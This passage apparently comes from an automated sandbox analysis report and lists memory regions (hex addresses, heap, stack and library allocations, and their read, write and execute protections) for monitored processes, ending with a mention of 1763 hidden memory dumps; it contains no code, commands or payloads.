stack
page read and write
1B8ADCB3000
trusted library allocation
page read and write
1B8ADCBD000
trusted library allocation
page read and write
10DE8B9D000
trusted library allocation
page read and write
1B8C4C82000
heap
page read and write
1B8A9D2F000
heap
page read and write
30EF000
heap
page read and write
1B8ADC8B000
trusted library allocation
page read and write
8828000
heap
page read and write
1EC7F2AB000
heap
page read and write
10DD8589000
trusted library allocation
page read and write
1EC01B53000
trusted library allocation
page read and write
52DE000
stack
page read and write
1B8BD136000
trusted library allocation
page read and write
5839000
trusted library allocation
page read and write
167D18F5000
trusted library allocation
page read and write
7FFD9BA2E000
trusted library allocation
page read and write
1B8C6731000
heap
page read and write
1F996040000
heap
page read and write
19B798EF000
heap
page read and write
6960000
heap
page read and write
167CFD50000
heap
page read and write
213714AA000
heap
page read and write
7FFD9B900000
trusted library allocation
page read and write
1EC01A22000
trusted library allocation
page read and write
1B8C5CE3000
heap
page read and write
10DE7B4B000
trusted library allocation
page read and write
1B8C4739000
heap
page read and write
10DE751D000
trusted library allocation
page read and write
267C40A0000
heap
page read and write
10DF0DFF000
heap
page read and write
7FFD9B8A0000
trusted library allocation
page read and write
2926085B000
heap
page read and write
10DE7D85000
trusted library allocation
page read and write
10DE8CA1000
trusted library allocation
page read and write
1EC01A0B000
trusted library allocation
page read and write
1B8ADCA5000
trusted library allocation
page read and write
1EC01B33000
trusted library allocation
page read and write
1EC119B1000
trusted library allocation
page read and write
EE7CFDC000
stack
page read and write
17A7149E000
heap
page read and write
7F920000
trusted library allocation
page execute and read and write
2CD5FE000
stack
page read and write
1EC019D7000
trusted library allocation
page read and write
1EC01800000
heap
page read and write
1EC019C3000
trusted library allocation
page read and write
1B8BCFBD000
trusted library allocation
page read and write
5FDE000
stack
page read and write
3D49000
trusted library allocation
page read and write
7BBD000
stack
page read and write
1B8C6092000
heap
page read and write
1B8BD14B000
trusted library allocation
page read and write
7FFD9B85D000
trusted library allocation
page execute and read and write
167CFE19000
heap
page read and write
10DE8B95000
trusted library allocation
page read and write
167CFD30000
trusted library allocation
page read and write
3BEEAFF000
stack
page read and write
2CCD8F000
stack
page read and write
22BB8120000
heap
page read and write
1B8A9C20000
heap
page read and write
1B8C4E4E000
heap
page read and write
1B8C41A8000
heap
page read and write
10DE8BF4000
trusted library allocation
page read and write
8CDE000
stack
page read and write
10DE7E1A000
trusted library allocation
page read and write
1B8C693F000
heap
page read and write
10DD75CD000
trusted library allocation
page read and write
1B8C6185000
heap
page read and write
14CAB1A0000
heap
page read and write
22D312D0000
heap
page read and write
10DE7BDA000
trusted library allocation
page read and write
5319FFF000
stack
page read and write
10DE74FD000
trusted library allocation
page read and write
C79EFD000
stack
page read and write
10DE7B37000
trusted library allocation
page read and write
10DE7FDA000
trusted library allocation
page read and write
7FFD9BA18000
trusted library allocation
page read and write
79DE000
stack
page read and write
1B8ADC83000
trusted library allocation
page read and write
1F996170000
heap
page read and write
1EC01A26000
trusted library allocation
page read and write
7FFD9B880000
trusted library allocation
page read and write
55E4000
trusted library allocation
page read and write
2DD0000
heap
page read and write
10DD79C1000
trusted library allocation
page read and write
2CDDFE000
stack
page read and write
7FFD9B936000
trusted library allocation
page read and write
1B8C4BCB000
heap
page read and write
4A70000
trusted library allocation
page read and write
22BB834C000
heap
page read and write
1B8BCF5F000
trusted library allocation
page read and write
1EC019D1000
trusted library allocation
page read and write
17A71437000
heap
page read and write
10DD7616000
trusted library allocation
page read and write
7FF41E430000
trusted library allocation
page execute and read and write
7851000
heap
page read and write
28873F5000
stack
page read and write
10DE759F000
trusted library allocation
page read and write
1B8A9EC5000
heap
page read and write
10DE7527000
trusted library allocation
page read and write
2CD8000
stack
page read and write
10DE8CC1000
trusted library allocation
page read and write
1B8C6EF8000
heap
page read and write
1B8C5E31000
heap
page read and write
1F997B00000
heap
page execute and read and write
1B8C5ED7000
heap
page read and write
10DD71FC000
heap
page read and write
611B000
stack
page read and write
10DD578A000
heap
page read and write
10DE769F000
trusted library allocation
page read and write
531AAFC000
stack
page read and write
1EC7F2CC000
heap
page read and write
10DD7668000
trusted library allocation
page read and write
1B8BD83E000
trusted library allocation
page read and write
10DEFBA0000
heap
page execute and read and write
6F8512C000
stack
page read and write
10DD578D000
heap
page read and write
10DF0E2F000
heap
page read and write
1B8C6797000
heap
page read and write
1EC7F270000
heap
page read and write
292607B8000
heap
page read and write
10DD583B000
heap
page read and write
7FFD9B870000
trusted library allocation
page read and write
2D40000
heap
page read and write
10DE8C7E000
trusted library allocation
page read and write
1B8C554D000
heap
page read and write
7872000
heap
page read and write
1B8C58DF000
heap
page read and write
1EC01A16000
trusted library allocation
page read and write
1B8C60DF000
heap
page read and write
10DD7996000
trusted library allocation
page read and write
10DD7867000
trusted library allocation
page read and write
10DE7C34000
trusted library allocation
page read and write
10DE7BAC000
trusted library allocation
page read and write
167D177F000
trusted library allocation
page read and write
10DD7649000
trusted library allocation
page read and write
10DE8ADA000
trusted library allocation
page read and write
7FFD9B9F8000
trusted library allocation
page read and write
22BB812B000
heap
page read and write
2267C570000
heap
page read and write
6D30000
heap
page read and write
1B8BD34B000
trusted library allocation
page read and write
7FFD9B840000
trusted library allocation
page read and write
8690000
trusted library allocation
page read and write
10DD75E0000
trusted library allocation
page read and write
5E9E000
stack
page read and write
10DE7BB5000
trusted library allocation
page read and write
2267C2F1000
heap
page read and write
1EC2A190000
heap
page read and write
1B8C5B50000
heap
page read and write
1B8ADC75000
trusted library allocation
page read and write
167D17DA000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
22D313E0000
heap
page read and write
22BB82F0000
heap
page read and write
1B8C541A000
heap
page read and write
6E70000
trusted library allocation
page read and write
10DD5630000
heap
page read and write
10DD755F000
trusted library allocation
page read and write
4FDE000
stack
page read and write
2ABCAFD7000
heap
page read and write
5BA8000
trusted library allocation
page read and write
7856000
heap
page read and write
10DE8D56000
trusted library allocation
page read and write
3DAA000
trusted library allocation
page read and write
1B8C6D66000
heap
page read and write
17A738F0000
heap
page read and write
10DD7573000
trusted library allocation
page read and write
EE7CFCE000
stack
page read and write
10DE7B6B000
trusted library allocation
page read and write
5831000
trusted library allocation
page read and write
7A80000
trusted library allocation
page read and write
10DE7C99000
trusted library allocation
page read and write
C7A1FF000
stack
page read and write
2CD8FC000
stack
page read and write
10DD8609000
trusted library allocation
page read and write
19B798D9000
heap
page read and write
10DE747C000
trusted library allocation
page read and write
29C3000
trusted library allocation
page execute and read and write
7FFD9B874000
trusted library allocation
page read and write
1F9960DB000
heap
page read and write
1B8C5D41000
heap
page read and write
3268000
heap
page read and write
10DF0CF0000
heap
page read and write
10DE7C5E000
trusted library allocation
page read and write
10DD5A45000
heap
page read and write
1B8AB951000
trusted library allocation
page read and write
167D17C2000
trusted library allocation
page read and write
1B8C53AC000
heap
page read and write
1B8AD7E2000
trusted library allocation
page read and write
1E6C5871000
heap
page read and write
8D5E000
stack
page read and write
2C10000
heap
page read and write
10DD79AC000
trusted library allocation
page read and write
7FFD9B874000
trusted library allocation
page read and write
1B8BD811000
trusted library allocation
page read and write
1EC01A07000
trusted library allocation
page read and write
1EC7F356000
heap
page read and write
5319DFC000
stack
page read and write
1E6C586C000
heap
page read and write
1B8A9E10000
heap
page read and write
3BEEEFE000
stack
page read and write
6F85116000
stack
page read and write
10DE7BC5000
trusted library allocation
page read and write
BE1138E000
stack
page read and write
7FFD9B906000
trusted library allocation
page read and write
2267C140000
heap
page read and write
6230000
heap
page read and write
10DE7400000
trusted library allocation
page read and write
7910000
trusted library allocation
page read and write
22BB8465000
heap
page read and write
896E000
heap
page read and write
6F3E000
stack
page read and write
29260802000
heap
page read and write
10DE7BD7000
trusted library allocation
page read and write
2CDBFC000
stack
page read and write
17A715C5000
heap
page read and write
F44000
heap
page read and write
17A00195000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
10DEFD0C000
heap
page read and write
1B8C5DAC000
heap
page read and write
7FFD9B89B000
trusted library allocation
page execute and read and write
1B8ADCC7000
trusted library allocation
page read and write
77F4000
heap
page read and write
2B70000
heap
page read and write
1B8A9D59000
heap
page read and write
4A50000
trusted library allocation
page read and write
10DD853B000
trusted library allocation
page read and write
1B8BD02D000
trusted library allocation
page read and write
1B8C5550000
heap
page read and write
233B5FC5000
heap
page read and write
21371330000
heap
page read and write
2A5E000
stack
page read and write
1F9B04B0000
heap
page read and write
1B8C4989000
heap
page read and write
10DD8597000
trusted library allocation
page read and write
501E000
stack
page read and write
940000
unkown
page readonly
1B8ADCDB000
trusted library allocation
page read and write
678D000
stack
page read and write
10DD85A2000
trusted library allocation
page read and write
167D1903000
trusted library allocation
page read and write
10DE8B70000
trusted library allocation
page read and write
1B8ADCA1000
trusted library allocation
page read and write
28872FB000
stack
page read and write
10DE7B5B000
trusted library allocation
page read and write
5319AFD000
stack
page read and write
7819000
heap
page read and write
17A10001000
trusted library allocation
page read and write
7FFD9B86B000
trusted library allocation
page execute and read and write
7FFD9B883000
trusted library allocation
page read and write
1B8BD0D4000
trusted library allocation
page read and write
17A001A0000
trusted library allocation
page read and write
167D17E9000
trusted library allocation
page read and write
2ABCAFDA000
heap
page read and write
1B8C6520000
heap
page read and write
7FFD9BA15000
trusted library allocation
page read and write
1B8C44EF000
heap
page read and write
267C3EC0000
heap
page read and write
10DEFD31000
heap
page read and write
15F667C000
stack
page read and write
7FFD9B842000
trusted library allocation
page read and write
10DE8BE3000
trusted library allocation
page read and write
E668EFE000
unkown
page read and write
2926086D000
heap
page read and write
7FFD9B90C000
trusted library allocation
page execute and read and write
10DE7BA1000
trusted library allocation
page read and write
7FFD9B844000
trusted library allocation
page read and write
1B8C67F3000
heap
page read and write
1B8C4250000
heap
page read and write
4AB0000
trusted library allocation
page read and write
6F85105000
stack
page read and write
761F000
stack
page read and write
10DE7464000
trusted library allocation
page read and write
1B8C4C35000
heap
page read and write
1B8AB670000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1B8BCF7A000
trusted library allocation
page read and write
7FFD9B8AC000
trusted library allocation
page execute and read and write
10DE74E0000
trusted library allocation
page read and write
288673D000
stack
page read and write
10DD783C000
trusted library allocation
page read and write
7FFD9B890000
trusted library allocation
page read and write
167D17B3000
trusted library allocation
page read and write
5F9E000
stack
page read and write
E85000
heap
page read and write
10DD79D7000
trusted library allocation
page read and write
1B8C6775000
heap
page read and write
1B8C62FB000
heap
page read and write
12FC2FE000
stack
page read and write
7FFD9B900000
trusted library allocation
page execute and read and write
7FFD9B970000
trusted library allocation
page execute and read and write
1B8ADC6F000
trusted library allocation
page read and write
17A001CE000
trusted library allocation
page read and write
10DE740A000
trusted library allocation
page read and write
3250000
trusted library section
page read and write
1EC2A0E0000
heap
page read and write
531A7FB000
stack
page read and write
1B8C4DEE000
heap
page read and write
1B8BD141000
trusted library allocation
page read and write
1B8C5448000
heap
page read and write
1B8C441C000
heap
page read and write
1B8C5C5F000
heap
page read and write
1B8C5572000
heap
page read and write
1F9961C0000
heap
page read and write
3BEE8FF000
stack
page read and write
10DD5775000
heap
page read and write
6D3C000
heap
page read and write
7FFD9B926000
trusted library allocation
page execute and read and write
1B8ADCE5000
trusted library allocation
page read and write
1B8C691D000
heap
page read and write
E668FFF000
stack
page read and write
10DE7C50000
trusted library allocation
page read and write
1F9B04BE000
heap
page read and write
1B8C4351000
heap
page read and write
1B8BC3FD000
trusted library allocation
page read and write
1B8BD276000
trusted library allocation
page read and write
1EC019CB000
trusted library allocation
page read and write
1B8BCFFD000
trusted library allocation
page read and write
10DE7DDA000
trusted library allocation
page read and write
10DE741A000
trusted library allocation
page read and write
17A714F0000
heap
page read and write
5B07000
trusted library allocation
page read and write
167CFCB5000
heap
page read and write
10DE74E6000
trusted library allocation
page read and write
942000
unkown
page readonly
7FFD9B880000
trusted library allocation
page read and write
6F85121000
stack
page read and write
1B8C545D000
heap
page read and write
1E6C5A00000
heap
page read and write
7FFD9B90C000
trusted library allocation
page execute and read and write
695D000
stack
page read and write
22D313B6000
heap
page read and write
2CDD000
stack
page read and write
4A92000
trusted library allocation
page read and write
1B8BD181000
trusted library allocation
page read and write
1B8ADC6D000
trusted library allocation
page read and write
1B8C5A88000
heap
page read and write
167D183D000
trusted library allocation
page read and write
10DD752D000
trusted library allocation
page read and write
2CCD4E000
stack
page read and write
267C3EAD000
heap
page read and write
F00000
heap
page read and write
267C3EB0000
heap
page read and write
EE7CF96000
stack
page read and write
167D1773000
trusted library allocation
page read and write
2DC9000
heap
page read and write
10DE7FC5000
trusted library allocation
page read and write
8700000
trusted library allocation
page execute and read and write
7FFD9B946000
trusted library allocation
page execute and read and write
10DE8B81000
trusted library allocation
page read and write
22BB817B000
heap
page read and write
7FFD9B853000
trusted library allocation
page execute and read and write
167D17D2000
trusted library allocation
page read and write
10DE7E70000
trusted library allocation
page read and write
29260770000
heap
page read and write
22BB80E0000
heap
page read and write
1B8C5618000
heap
page read and write
167D17F1000
trusted library allocation
page read and write
1EC7F505000
heap
page read and write
1F995EB0000
unkown
page readonly
10DD576B000
heap
page read and write
1E6C585B000
heap
page read and write
10DD758D000
trusted library allocation
page read and write
10DD7474000
trusted library allocation
page read and write
28871F9000
stack
page read and write
C7A4FE000
stack
page read and write
1B8ADC97000
trusted library allocation
page read and write
22BB818A000
heap
page read and write
6139000
trusted library allocation
page read and write
10DD8515000
trusted library allocation
page read and write
2267C2F2000
heap
page read and write
1EC01B73000
trusted library allocation
page read and write
1B8C53D7000
heap
page read and write
505D000
stack
page read and write
4F43AFB000
stack
page read and write
30AD2FE000
stack
page read and write
167CFCC0000
heap
page read and write
10DE8C00000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page execute and read and write
267C4210000
heap
page read and write
1B8BD301000
trusted library allocation
page read and write
2D1E000
stack
page read and write
10DD755B000
trusted library allocation
page read and write
167D1887000
trusted library allocation
page read and write
1B8BB9BD000
trusted library allocation
page read and write
88F2000
heap
page read and write
19B79978000
heap
page read and write
292607CC000
heap
page read and write
167D17AB000
trusted library allocation
page read and write
2ABCAFD0000
heap
page read and write
1B8BD00C000
trusted library allocation
page read and write
22BB8310000
heap
page read and write
10DE7482000
trusted library allocation
page read and write
1E6C586D000
heap
page read and write
29F7000
trusted library allocation
page execute and read and write
1B8C4CC4000
heap
page read and write
1EC01A41000
trusted library allocation
page read and write
4AFE000
stack
page read and write
29CD000
trusted library allocation
page execute and read and write
714E000
stack
page read and write
FB0000
heap
page read and write
6F850E6000
stack
page read and write
10DD747C000
trusted library allocation
page read and write
1F9960B1000
heap
page read and write
1B8C54D4000
heap
page read and write
2CDEFE000
stack
page read and write
1B8C6FA2000
heap
page read and write
7FFD9B87D000
trusted library allocation
page execute and read and write
10DE8E61000
trusted library allocation
page read and write
1B8A9C40000
heap
page read and write
1F996070000
heap
page read and write
10DE7505000
trusted library allocation
page read and write
1BE49080000
heap
page read and write
10DD7790000
trusted library allocation
page read and write
1B8ADCF6000
trusted library allocation
page read and write
3BEECFE000
stack
page read and write
1B8C6BB5000
heap
page read and write
10DE7637000
trusted library allocation
page read and write
10DD7955000
trusted library allocation
page read and write
1B8C5CF2000
heap
page read and write
1B8C4472000
heap
page read and write
1B8BD261000
trusted library allocation
page read and write
7FFD9B8AC000
trusted library allocation
page execute and read and write
1B8ADCEB000
trusted library allocation
page read and write
1B8ADC81000
trusted library allocation
page read and write
1B8C61EB000
heap
page read and write
17A738E0000
heap
page execute and read and write
4BC7000
heap
page read and write
1EC019EF000
trusted library allocation
page read and write
1B8C44D5000
heap
page read and write
1B8C56C3000
heap
page read and write
22BB8344000
heap
page read and write
17A001B2000
trusted library allocation
page read and write
6E6F000
unkown
page read and write
167CFDB8000
heap
page read and write
1B8C6A69000
heap
page read and write
741B000
stack
page read and write
1E6C5A80000
heap
page read and write
1B8C6143000
heap
page read and write
167D1771000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1B8BCF57000
trusted library allocation
page read and write
10DE73F1000
trusted library allocation
page read and write
1B8C5366000
heap
page read and write
10DE7E5A000
trusted library allocation
page read and write
233B5CF0000
heap
page read and write
10DE8B48000
trusted library allocation
page read and write
EE7CFD1000
stack
page read and write
1B8C6605000
heap
page read and write
7FFD9B894000
trusted library allocation
page read and write
1B8C4DAC000
heap
page read and write
552E000
stack
page read and write
1EC1A180000
heap
page read and write
1E6C583B000
heap
page read and write
1B8C670F000
heap
page read and write
1E6C5855000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1F996190000
heap
page read and write
531A0FF000
stack
page read and write
1EC019E7000
trusted library allocation
page read and write
2D8D000
stack
page read and write
3BEEBFD000
stack
page read and write
10DD859B000
trusted library allocation
page read and write
1B8C6899000
heap
page read and write
2267C2AB000
heap
page read and write
17A001C1000
trusted library allocation
page read and write
10DE8C61000
trusted library allocation
page read and write
1B8C6DEB000
heap
page read and write
F10000
heap
page read and write
10DE7C42000
trusted library allocation
page read and write
85A491F000
stack
page read and write
2C05000
trusted library allocation
page read and write
2C9C000
stack
page read and write
7FFD9B860000
trusted library allocation
page read and write
10DD787C000
trusted library allocation
page read and write
6BEE000
stack
page read and write
735D000
stack
page read and write
1B8C5A7F000
heap
page read and write
1EC01B45000
trusted library allocation
page read and write
7FFD9B910000
trusted library allocation
page execute and read and write
1B8C6689000
heap
page read and write
10DE8B28000
trusted library allocation
page read and write
6D72000
heap
page read and write
10DE8B2A000
trusted library allocation
page read and write
1EC019EB000
trusted library allocation
page read and write
22BB817C000
heap
page read and write
167D1775000
trusted library allocation
page read and write
EE7D2FF000
stack
page read and write
167D17E2000
trusted library allocation
page read and write
22BB8460000
heap
page read and write
1B8C5B99000
heap
page read and write
1F9961C5000
heap
page read and write
1EC7F595000
heap
page read and write
14CAAFB7000
heap
page read and write
10DE7BD5000
trusted library allocation
page read and write
233B5C10000
heap
page read and write
10DE7C40000
trusted library allocation
page read and write
1B8C6E0D000
heap
page read and write
30AC5AE000
stack
page read and write
8D9C000
stack
page read and write
2886AFE000
stack
page read and write
2CD3FC000
stack
page read and write
1EC019BF000
trusted library allocation
page read and write
167CFC90000
heap
page read and write
1EC7F250000
heap
page read and write
1B8BD0E1000
trusted library allocation
page read and write
1E6C5A20000
heap
page read and write
AB8B4FF000
stack
page read and write
1B8C4393000
heap
page read and write
2267C2E1000
heap
page read and write
1B8C53B1000
heap
page read and write
10DD860D000
trusted library allocation
page read and write
10DE7A67000
trusted library allocation
page read and write
7FFD9B86D000
trusted library allocation
page execute and read and write
10DD75D5000
trusted library allocation
page read and write
703E000
stack
page read and write
67CE000
stack
page read and write
10DD77D0000
trusted library allocation
page read and write
167D17DE000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
167D1797000
trusted library allocation
page read and write
1B8BD01F000
trusted library allocation
page read and write
10DD5730000
heap
page read and write
10DD58D0000
trusted library allocation
page read and write
1E6C5A70000
heap
page read and write
2926087F000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
10DD7851000
trusted library allocation
page read and write
1B8BD0DD000
trusted library allocation
page read and write
1B8C4879000
heap
page read and write
67E0000
trusted library allocation
page execute and read and write
7FFD9B936000
trusted library allocation
page execute and read and write
167D179B000
trusted library allocation
page read and write
1B8C56E2000
heap
page read and write
1B8C6D23000
heap
page read and write
2BAB000
trusted library allocation
page read and write
1EC01A39000
trusted library allocation
page read and write
29D3000
trusted library allocation
page read and write
786A000
heap
page read and write
78E0000
heap
page execute and read and write
167D179F000
trusted library allocation
page read and write
1B8C5A79000
heap
page read and write
30ACCFF000
stack
page read and write
1EC01A35000
trusted library allocation
page read and write
1B8C6647000
heap
page read and write
10DD8610000
trusted library allocation
page read and write
29E6000
trusted library allocation
page execute and read and write
167D17A3000
trusted library allocation
page read and write
1B8BD865000
trusted library allocation
page read and write
22D313E1000
heap
page read and write
7FFD9B873000
trusted library allocation
page execute and read and write
1B8BCF87000
trusted library allocation
page read and write
D40000
heap
page read and write
14CAB265000
heap
page read and write
1B8ADC99000
trusted library allocation
page read and write
2CE4FD000
stack
page read and write
10DE7D45000
trusted library allocation
page read and write
62A6000
trusted library allocation
page read and write
7DC97FF000
stack
page read and write
2BCD000
trusted library allocation
page read and write
1EC017D0000
trusted library allocation
page read and write
1B8C4150000
heap
page read and write
3BEEDFE000
stack
page read and write
7FFD9B862000
trusted library allocation
page read and write
30AF000
heap
page read and write
167D17AF000
trusted library allocation
page read and write
10DE755F000
trusted library allocation
page read and write
1EC019C1000
trusted library allocation
page read and write
7FFD9B88D000
trusted library allocation
page execute and read and write
29260813000
heap
page read and write
1EC7F500000
heap
page read and write
2CE6FB000
stack
page read and write
7FFD9B926000
trusted library allocation
page read and write
167CFD8A000
heap
page read and write
22BB8158000
heap
page read and write
7FFD9B873000
trusted library allocation
page read and write
5319EFD000
stack
page read and write
1B8C622F000
heap
page read and write
4A87000
trusted library allocation
page execute and read and write
1B8C4A0D000
heap
page read and write
1B8C5150000
heap
page read and write
10DD7892000
trusted library allocation
page read and write
7FFD9B86D000
trusted library allocation
page execute and read and write
1EC01AD7000
trusted library allocation
page read and write
1B8C633D000
heap
page read and write
76C2000
heap
page read and write
1B8C6F1A000
heap
page read and write
5111000
trusted library allocation
page read and write
7420000
heap
page read and write
1EC019E4000
trusted library allocation
page read and write
1EC1A100000
heap
page execute and read and write
10DE74BE000
trusted library allocation
page read and write
583E000
trusted library allocation
page read and write
7FFD9B852000
trusted library allocation
page read and write
53195DF000
stack
page read and write
1B8C6ACD000
heap
page read and write
1B8C5BDB000
heap
page read and write
267C3E7B000
heap
page read and write
10DD85C7000
trusted library allocation
page read and write
1F995F60000
heap
page read and write
1B8C420A000
heap
page read and write
1B8C604E000
heap
page read and write
10DD75C4000
trusted library allocation
page read and write
10DD75E3000
trusted library allocation
page read and write
1B8BB9FD000
trusted library allocation
page read and write
2267C240000
heap
page read and write
2886FFE000
stack
page read and write
BE1167F000
stack
page read and write
1EC2A485000
heap
page read and write
10DE74E4000
trusted library allocation
page read and write
EF0000
heap
page read and write
1B8A9CE0000
trusted library allocation
page read and write
1B8C6877000
heap
page read and write
1F996200000
trusted library allocation
page read and write
1B8ADCBB000
trusted library allocation
page read and write
1B8ADCD9000
trusted library allocation
page read and write
167D1794000
trusted library allocation
page read and write
2886EFE000
stack
page read and write
1B8C6D6B000
heap
page read and write
4A64000
trusted library allocation
page read and write
30ACDFE000
stack
page read and write
2BC1000
trusted library allocation
page read and write
1B8ADCC9000
trusted library allocation
page read and write
10DD5850000
heap
page read and write
62E0000
heap
page read and write
664E000
stack
page read and write
7B20000
heap
page read and write
1B8C6FE6000
heap
page read and write
765E000
stack
page read and write
531955E000
stack
page read and write
1B8C6493000
heap
page read and write
7FFD9B870000
trusted library allocation
page read and write
5319BFE000
stack
page read and write
F18000
heap
page read and write
21371615000
heap
page read and write
10DE8B4F000
trusted library allocation
page read and write
1EC01A8F000
trusted library allocation
page read and write
1B8C4823000
heap
page read and write
1B8A9CC0000
trusted library allocation
page read and write
3D89000
trusted library allocation
page read and write
30AC8FE000
stack
page read and write
1B8C48FD000
heap
page read and write
1EC01A44000
trusted library allocation
page read and write
10DE7C44000
trusted library allocation
page read and write
2886DFD000
stack
page read and write
1B8C4D48000
heap
page read and write
10DD75CF000
trusted library allocation
page read and write
1B8C48BB000
heap
page read and write
19B7998A000
heap
page read and write
17A71583000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1B8ADC9D000
trusted library allocation
page read and write
2ABCB1B0000
heap
page read and write
1B8C5FBF000
heap
page read and write
10DE8B57000
trusted library allocation
page read and write
1B8A9C95000
heap
page read and write
10DD58A0000
trusted library allocation
page read and write
1B8C5B0E000
heap
page read and write
1B8C56A1000
heap
page read and write
324E000
stack
page read and write
7FFD9B85D000
trusted library allocation
page execute and read and write
1B8C6295000
heap
page read and write
7FFD9B86D000
trusted library allocation
page execute and read and write
267C3E70000
heap
page read and write
29260842000
heap
page read and write
7859000
heap
page read and write
10DE7BB7000
trusted library allocation
page read and write
77C0000
heap
page read and write
10DE7BD2000
trusted library allocation
page read and write
1F995EB0000
unkown
page readonly
1B8C41D5000
heap
page read and write
10DE7FB0000
trusted library allocation
page read and write
7FFD9B93C000
trusted library allocation
page execute and read and write
22BB816A000
heap
page read and write
1EC7F2BB000
heap
page read and write
7B4D000
trusted library allocation
page read and write
167CFCB0000
heap
page read and write
1B8C6A27000
heap
page read and write
2CD1FE000
stack
page read and write
1B8ADCCD000
trusted library allocation
page read and write
167CFDB6000
heap
page read and write
1F996076000
heap
page read and write
167CFE1C000
heap
page read and write
6EF0000
trusted library allocation
page execute and read and write
1B8C5F7D000
heap
page read and write
4BC0000
heap
page read and write
1B8BD086000
trusted library allocation
page read and write
10DE7D30000
trusted library allocation
page read and write
17A713F6000
heap
page read and write
7FFD9B884000
trusted library allocation
page read and write
2D93000
trusted library allocation
page read and write
7B4B000
trusted library allocation
page read and write
1B8C4943000
heap
page read and write
62B7000
trusted library allocation
page read and write
10DE74F6000
trusted library allocation
page read and write
8862000
heap
page read and write
1B8BD169000
trusted library allocation
page read and write
5160000
trusted library allocation
page read and write
10DD74EF000
trusted library allocation
page read and write
17A715C0000
heap
page read and write
1B8ADC79000
trusted library allocation
page read and write
15F66FE000
stack
page read and write
12FBF8C000
stack
page read and write
2DBC000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
EE7CFA4000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
167EA112000
heap
page read and write
10DE7DB0000
trusted library allocation
page read and write
7FFD9B966000
trusted library allocation
page execute and read and write
1B8C62D9000
heap
page read and write
22D313CB000
heap
page read and write
1F9961E0000
trusted library allocation
page read and write
E80000
heap
page read and write
3040000
heap
page read and write
2DAA000
trusted library allocation
page read and write
1F99615E000
heap
page read and write
7FFD9B8A4000
trusted library allocation
page read and write
1B8C5ACC000
heap
page read and write
1B8C4183000
heap
page read and write
10DD5710000
heap
page read and write
1EC01A0E000
trusted library allocation
page read and write
1B8BD835000
trusted library allocation
page read and write
1B8C43AB000
heap
page read and write
531ADFD000
stack
page read and write
292607B0000
heap
page read and write
1B8ADC8D000
trusted library allocation
page read and write
1F9A7DF1000
trusted library allocation
page read and write
1B8A9CF6000
heap
page read and write
167D177D000
trusted library allocation
page read and write
1B8ADC67000
trusted library allocation
page read and write
531A2FE000
stack
page read and write
1F99607C000
heap
page read and write
8630000
trusted library allocation
page read and write
17A7140B000
heap
page read and write
1B8C578D000
heap
page read and write
1B8ADCA9000
trusted library allocation
page read and write
1B8C4409000
heap
page read and write
1B8C4801000
heap
page read and write
1B8C5811000
heap
page read and write
785F000
heap
page read and write
167D1924000
trusted library allocation
page read and write
1B8AB8E0000
heap
page read and write
1B8C642F000
heap
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
10DE7C0F000
trusted library allocation
page read and write
10DD75CA000
trusted library allocation
page read and write
AB8B2FC000
stack
page read and write
1B8C4201000
heap
page read and write
7A70000
trusted library allocation
page read and write
1B8ADC7B000
trusted library allocation
page read and write
10DD857C000
trusted library allocation
page read and write
2BFF000
trusted library allocation
page read and write
1B8BD0EB000
trusted library allocation
page read and write
167CFD7B000
heap
page read and write
E668BDB000
stack
page read and write
2D84000
trusted library allocation
page read and write
10DE7627000
trusted library allocation
page read and write
10DE7BC2000
trusted library allocation
page read and write
10DD773A000
trusted library allocation
page read and write
5330000
heap
page read and write
1B8C58B7000
heap
page read and write
C79BFF000
stack
page read and write
1B8ADCEF000
trusted library allocation
page read and write
267C4215000
heap
page read and write
1B8BCF62000
trusted library allocation
page read and write
19B79978000
heap
page read and write
167D17D6000
trusted library allocation
page read and write
10DD7B59000
trusted library allocation
page read and write
30D5000
heap
page read and write
87C0000
trusted library allocation
page read and write
167CFD6B000
heap
page read and write
7808000
heap
page read and write
8680000
trusted library allocation
page read and write
1B8C620D000
heap
page read and write
86E2000
trusted library allocation
page read and write
233B5FC0000
heap
page read and write
1EC019B1000
trusted library allocation
page read and write
22D313BA000
heap
page read and write
1EC01A3D000
trusted library allocation
page read and write
60DE000
stack
page read and write
1B8C6C5B000
heap
page read and write
87D0000
trusted library allocation
page read and write
1EC2A480000
heap
page read and write
30AD0FE000
stack
page read and write
10DE7D95000
trusted library allocation
page read and write
1B8C4404000
heap
page read and write
648B000
stack
page read and write
4F60000
trusted library allocation
page read and write
1B8ADCA7000
trusted library allocation
page read and write
1B8C6471000
heap
page read and write
1BE48F70000
heap
page read and write
8820000
heap
page read and write
1EC019A0000
heap
page execute and read and write
1B8C4E30000
heap
page read and write
1B8C65A6000
heap
page read and write
1B8A9EC0000
heap
page read and write
10DD75DD000
trusted library allocation
page read and write
1B8C62B7000
heap
page read and write
3BEF0FB000
stack
page read and write
167D17CE000
trusted library allocation
page read and write
292609B0000
trusted library allocation
page read and write
1EC01A98000
trusted library allocation
page read and write
1B8BD0BB000
trusted library allocation
page read and write
8888000
heap
page read and write
C79CFE000
stack
page read and write
E20000
heap
page read and write
2B73000
heap
page read and write
1EC7F2F8000
heap
page read and write
167CFF60000
heap
page read and write
1B8C5D63000
heap
page read and write
1B8C6098000
heap
page read and write
167D183F000
trusted library allocation
page read and write
10DE8B84000
trusted library allocation
page read and write
110E000
stack
page read and write
2CDFFE000
stack
page read and write
1B8C4A4F000
heap
page read and write
There are 1763 hidden memdumps, click here to show them.